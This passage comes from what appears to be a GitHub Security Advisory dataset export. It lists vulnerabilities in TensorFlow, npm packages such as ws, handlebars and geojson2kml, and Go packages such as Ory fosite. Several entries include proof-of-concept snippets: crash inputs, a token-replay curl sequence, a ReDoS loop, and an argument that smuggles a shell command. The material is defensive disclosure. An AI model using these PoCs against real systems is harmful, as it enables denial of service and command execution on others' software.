'https://nvd.nist.gov/vuln/detail/CVE-2021-29559'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/51300ba1cc2f487aefec6e6631fef03b0e08b298'}]","{'cwe_ids': ['CWE-125'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T20:27:11Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-f98m-q3hr-p5wq,2021-12-14T15:33:28Z,2021-05-06T18:12:22Z,,['CVE-2020-7719'],Prototype Pollution in locutus,All versions of package locutus prior to version 2.0.12 are vulnerable to Prototype Pollution via the php.strings.parse_str function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'locutus'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7719'}, {'type': 'WEB', 'url': 'https://github.com/kvz/locutus/pull/418/'}, {'type': 'WEB', 'url': 'https://github.com/locutusjs/locutus/commit/0eb16d8541838e80f3c2340a9ef93ded7c97290f'}, {'type': 'PACKAGE', 'url': 'https://github.com/kvz/locutus'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-LOCUTUS-598675'}]","{'cwe_ids': ['CWE-1321', 'CWE-20', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T18:44:01Z', 'nvd_published_at': '2020-09-01T10:15:00Z'}" +1.4.0,GHSA-85cp-p426-42f5,2021-05-05T18:16:57Z,2021-05-06T18:12:59Z,,['CVE-2020-7715'],Prototype Pollution in deep-get-set,All versions of package deep-get-set prior to version 1.1.1 are vulnerable to Prototype Pollution via the main function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'deep-get-set'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7715'}, {'type': 'WEB', 'url': 'https://github.com/acstll/deep-get-set/commit/a127e65bc77ff5707a6a103819e140d11475c5f4'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DEEPGETSET-598666'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T18:16:57Z', 'nvd_published_at': '2020-09-01T10:15:00Z'}" +1.4.0,GHSA-v3q9-2p3m-7g43,2023-08-29T23:07:22Z,2021-05-24T16:57:52Z,,['CVE-2020-15222'],Token reuse in Ory fosite,"### Impact + +When using client authentication method ""private_key_jwt"" [[1]](https://openid.net/specs/openid-connect-core-1_0.html#ClientAuthentication), OpenId specification says the following about assertion `jti`: + +> A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties + +Hydra does not seem to check the uniqueness of this `jti` value. Here is me sending the same token request twice, hence with the same `jti` assertion, and getting two access tokens: + +``` +$ curl --insecure --location --request POST 'https://localhost/_/oauth2/token' \ + --header 'Content-Type: application/x-www-form-urlencoded' \ + --data-urlencode 'grant_type=client_credentials' \ + --data-urlencode 'client_id=c001d00d-5ecc-beef-ca4e-b00b1e54a111' \ + --data-urlencode 'scope=application openid' \ + --data-urlencode 'client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer' \ + --data-urlencode 'client_assertion=eyJhb [...] jTw' +{""access_token"":""zeG0NoqOtlACl8q5J6A-TIsNegQRRUzqLZaYrQtoBZQ.VR6iUcJQYp3u_j7pwvL7YtPqGhtyQe5OhnBE2KCp5pM"",""expires_in"":3599,""scope"":""application openid"",""token_type"":""bearer""}⏎ +$ curl --insecure --location --request POST 'https://localhost/_/oauth2/token' \ + --header 'Content-Type: application/x-www-form-urlencoded' \ + --data-urlencode 'grant_type=client_credentials' \ + --data-urlencode 'client_id=c001d00d-5ecc-beef-ca4e-b00b1e54a111' \ + --data-urlencode 'scope=application openid' \ + --data-urlencode 'client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer' \ + --data-urlencode 'client_assertion=eyJhb [...] jTw' +{""access_token"":""wOYtgCLxLXlELORrwZlmeiqqMQ4kRzV-STU2_Sollas.mwlQGCZWXN7G2IoegUe1P0Vw5iGoKrkOzOaplhMSjm4"",""expires_in"":3599,""scope"":""application openid"",""token_type"":""bearer""} +``` + +### Patches + +This issue is patched in 0.31.0. + +### Workarounds + +Do not allow clients to use `private_key_jwt`. + +### References + +https://openid.net/specs/openid-connect-core-1_0.html#ClientAuthentication","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ory/fosite'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.31.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ory/fosite/security/advisories/GHSA-v3q9-2p3m-7g43'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15222'}, {'type': 'WEB', 'url': 'https://github.com/ory/fosite/commit/0c9e0f6d654913ad57c507dd9a36631e1858a3e9'}, {'type': 'PACKAGE', 'url': 'https://github.com/ory/fosite'}, {'type': 'WEB', 'url': 'https://github.com/ory/fosite/releases/tag/v0.31.0'}, {'type': 'WEB', 'url': 'https://openid.net/specs/openid-connect-core-1_0.html#ClientAuthentication'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0110'}]","{'cwe_ids': ['CWE-287', 'CWE-345'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T12:52:00Z', 'nvd_published_at': '2020-09-24T17:15:00Z'}" +1.4.0,GHSA-9rpc-5v9q-5r7f,2021-05-17T22:00:57Z,2021-05-21T14:28:35Z,,['CVE-2021-29611'],Incomplete validation in `SparseReshape`,"### Impact +Incomplete validation in `SparseReshape` results in a denial of service based on a `CHECK`-failure. + +```python +import tensorflow as tf + +input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) +input_shape = tf.zeros([11], dtype=tf.int64) +new_shape = tf.zeros([1], dtype=tf.int64) + +tf.raw_ops.SparseReshape(input_indices=input_indices, + input_shape=input_shape, + new_shape=new_shape) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/e87b51ce05c3eb172065a6ea5f48415854223285/tensorflow/core/kernels/sparse_reshape_op.cc#L40) has no validation that the input arguments specify a valid sparse tensor. + +### Patches +We have patched the issue in GitHub commit [1d04d7d93f4ed3854abf75d6b712d72c3f70d6b6](https://github.com/tensorflow/tensorflow/commit/1d04d7d93f4ed3854abf75d6b712d72c3f70d6b6). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3, as these are the only affected versions. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9rpc-5v9q-5r7f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29611'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/1d04d7d93f4ed3854abf75d6b712d72c3f70d6b6'}]","{'cwe_ids': ['CWE-20', 'CWE-665'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:00:57Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-r6fw-8m27-43c9,2022-07-05T18:02:15Z,2021-05-06T15:53:20Z,,['CVE-2021-23379'],Command injection in portkiller,"This affects all versions of package portkiller. If (attacker-controlled) user input is given, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'portkiller'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23379'}, {'type': 'PACKAGE', 'url': 'https://github.com/indatawetrust/portkiller'}, {'type': 'WEB', 'url': 'https://github.com/indatawetrust/portkiller/blob/f1f1c5076d9c5d60e8dd3930e98d665d8191aa7a/index.js%23L10'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PORTKILLER-1078537'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/portkiller'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T21:19:04Z', 'nvd_published_at': '2021-04-18T19:15:00Z'}" +1.4.0,GHSA-5rcv-m4m3-hfh7,2023-09-29T17:27:28Z,2021-05-18T18:34:35Z,,['CVE-2020-14040'],golang.org/x/text Infinite loop,"Go version v0.3.3 of the x/text package fixes a vulnerability in encoding/unicode that could lead to the UTF-16 decoder entering an infinite loop, causing the program to crash or run out of memory. An attacker could provide a single byte to a UTF16 decoder instantiated with UseBOM or ExpectBOM to trigger an infinite loop if the String function on the Decoder is called, or the Decoder is passed to golang.org/x/text/transform.String. + +### Specific Go Packages Affected +golang.org/x/text/encoding/unicode +golang.org/x/text/transform","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C'}]","[{'package': {'ecosystem': 'Go', 'name': 'golang.org/x/text'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-14040'}, {'type': 'WEB', 'url': 'https://github.com/golang/go/issues/39491'}, {'type': 'WEB', 'url': 'https://github.com/golang/text/commit/23ae387dee1f90d29a23c0e87ee0b46038fbed0e'}, {'type': 'WEB', 'url': 'https://go-review.googlesource.com/c/text/+/238238'}, {'type': 'WEB', 'url': 'https://go.dev/cl/238238'}, {'type': 'WEB', 'url': 'https://go.dev/issue/39491'}, {'type': 'WEB', 'url': 'https://go.googlesource.com/text/+/23ae387dee1f90d29a23c0e87ee0b46038fbed0e'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/golang-announce/bXVeAmGOqz0'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/golang-announce/c/bXVeAmGOqz0'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TACQFZDPA7AUR6TRZBCX2RGRFSDYLI7O/'}]","{'cwe_ids': ['CWE-400', 'CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T14:54:58Z', 'nvd_published_at': None}" +1.4.0,GHSA-fphq-gw9m-ghrv,2021-05-18T21:52:51Z,2021-05-21T14:23:18Z,,['CVE-2021-29543'],CHECK-fail in `CTCGreedyDecoder`,"### Impact +An attacker can trigger a denial of service via a `CHECK`-fail in `tf.raw_ops.CTCGreedyDecoder`: + +```python +import tensorflow as tf + +inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32) +sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32) +merge_repeated = False + +tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/1615440b17b364b875eb06f43d087381f1460a65/tensorflow/core/kernels/ctc_decoder_ops.cc#L37-L50) has a `CHECK_LT` inserted to validate some invariants. When this condition is false, the program aborts, instead of returning a valid error to the user. This abnormal termination can be weaponized in denial of service attacks. + +### Patches +We have patched the issue in GitHub commit [ea3b43e98c32c97b35d52b4c66f9107452ca8fb2](https://github.com/tensorflow/tensorflow/commit/ea3b43e98c32c97b35d52b4c66f9107452ca8fb2). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fphq-gw9m-ghrv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29543'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ea3b43e98c32c97b35d52b4c66f9107452ca8fb2'}]","{'cwe_ids': ['CWE-617'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T21:52:51Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-9vpm-rcf4-9wqw,2021-05-18T18:38:17Z,2021-05-21T14:26:07Z,,['CVE-2021-29573'],Division by 0 in `MaxPoolGradWithArgmax`,"### Impact +The implementation of `tf.raw_ops.MaxPoolGradWithArgmax` is vulnerable to a division by 0: + +```python +import tensorflow as tf + +input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) +grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) +argmax = tf.constant([], shape=[0], dtype=tf.int64) +ksize = [1, 1, 1, 1] +strides = [1, 1, 1, 1] + +tf.raw_ops.MaxPoolGradWithArgmax( + input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, + padding='SAME', include_batch_in_index=False) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/279bab6efa22752a2827621b7edb56a730233bd8/tensorflow/core/kernels/maxpooling_op.cc#L1033-L1034) fails to validate that the batch dimension of the tensor is non-zero, before dividing by this quantity. + +### Patches +We have patched the issue in GitHub commit [376c352a37ce5a68b721406dc7e77ac4b6cf483d](https://github.com/tensorflow/tensorflow/commit/376c352a37ce5a68b721406dc7e77ac4b6cf483d). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9vpm-rcf4-9wqw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29573'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/376c352a37ce5a68b721406dc7e77ac4b6cf483d'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T18:38:17Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-w83x-fp72-p9qc,2023-09-06T23:00:08Z,2021-05-10T15:59:33Z,,['CVE-2020-28429'],Command Injection in geojson2kml,"All versions up to and including version 0.1.1 of package geojson2kml are vulnerable to Command Injection via the index.js file. + +### PoC: +```js +var a =require(""geojson2kml""); +a(""./"",""& touch JHU"",function(){}) +```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'geojson2kml'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28429'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T20:58:30Z', 'nvd_published_at': '2021-02-23T15:15:00Z'}" +1.4.0,GHSA-rrqv-vjrw-hrcr,2021-05-26T19:57:10Z,2021-05-26T19:59:19Z,,[],Arbitrary Code Execution in json-ptr,"There is a security vulnerability in `json-ptr` versions prior to v2.1.0 in which an unscrupulous actor may execute arbitrary code. If your code sends un-sanitized user input to json-ptr's .get() method, your project is vulnerable to this injection-style vulnerability.",[],"[{'package': {'ecosystem': 'npm', 'name': 'json-ptr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/418sec/json-ptr/pull/3'}, {'type': 'WEB', 'url': 'https://github.com/flitbit/json-ptr/blob/456a1728b45c8663bb1ac20a249c5fb17495ec6b/README.md#security-vulnerability-prior-to-v210'}, {'type': 'WEB', 'url': 'https://github.com/flitbit/json-ptr/blob/master/src/util.ts%23L174'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038396'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSONPTR-1016939'}, {'type': 'WEB', 'url': 'https://www.huntr.dev/bounties/2-npm-json-ptr/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1706'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/json-ptr'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-26T19:57:10Z', 'nvd_published_at': None}" +1.4.0,GHSA-6fc8-4gx4-v693,2021-10-06T22:05:51Z,2021-05-28T19:19:03Z,,['CVE-2021-32640'],ReDoS in Sec-Websocket-Protocol header,"### Impact + +A specially crafted value of the `Sec-Websocket-Protocol` header can be used to significantly slow down a ws server. + +### Proof of concept + +```js +for (const length of [1000, 2000, 4000, 8000, 16000, 32000]) { + const value = 'b' + ' '.repeat(length) + 'x'; + const start = process.hrtime.bigint(); + + value.trim().split(/ *, */); + + const end = process.hrtime.bigint(); + + console.log('length = %d, time = %f ns', length, end - start); +} +``` + +### Patches + +The vulnerability was fixed in ws@7.4.6 (https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff) and backported to ws@6.2.2 (https://github.com/websockets/ws/commit/78c676d2a1acefbc05292e9f7ea0a9457704bf1b) and ws@5.2.3 (https://github.com/websockets/ws/commit/76d47c1479002022a3e4357b3c9f0e23a68d4cd2). + +### Workarounds + +In vulnerable versions of ws, the issue can be mitigated by reducing the maximum allowed length of the request headers using the [`--max-http-header-size=size`](https://nodejs.org/api/cli.html#cli_max_http_header_size_size) and/or the [`maxHeaderSize`](https://nodejs.org/api/http.html#http_http_createserver_options_requestlistener) options. + +### Credits + +The vulnerability was responsibly disclosed along with a fix in private by [Robert McLaughlin](https://github.com/robmcl4) from University of California, Santa Barbara. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'ws'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.4.6'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ws'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.2.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ws'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/websockets/ws/security/advisories/GHSA-6fc8-4gx4-v693'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32640'}, {'type': 'WEB', 'url': 'https://github.com/websockets/ws/issues/1895'}, {'type': 'WEB', 'url': 'https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff'}, {'type': 'PACKAGE', 'url': 'https://github.com/websockets/ws'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdfa7b6253c4d6271e31566ecd5f30b7ce1b8fb2c89d52b8c4e0f4e30@%3Ccommits.tinkerpop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210706-0005/'}]","{'cwe_ids': ['CWE-345', 'CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T18:18:04Z', 'nvd_published_at': '2021-05-25T19:15:00Z'}" +1.4.0,GHSA-vh6r-g38f-q3w8,2021-05-05T22:34:04Z,2021-05-06T17:27:58Z,,['CVE-2020-17479'],Validation bypass in jpv,"jpv (aka Json Pattern Validator) before 2.2.2 does not properly validate input, as demonstrated by a corrupted array.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jpv'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-17479'}, {'type': 'WEB', 'url': 'https://github.com/manvel-khnkoyan/jpv/issues/10'}, {'type': 'WEB', 'url': 'https://github.com/manvel-khnkoyan/jpv/commit/e3eec1215caa8d5c560f5e88d0943422831927d6'}, {'type': 'WEB', 'url': 'https://blog.sonatype.com/cve-2020-17479'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/jpv'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T22:34:04Z', 'nvd_published_at': '2020-08-10T20:15:00Z'}" +1.4.0,GHSA-f2jv-r9rf-7988,2022-10-04T16:29:30Z,2021-05-06T15:57:44Z,,['CVE-2021-23369'],Remote code execution in handlebars when compiling templates,The package handlebars before 4.7.7 are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'handlebars'}, 'ecosystem_specific': {'affected_functions': ['handlebars.template']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.7.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars:handlebars'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.7.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:handlebars'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': 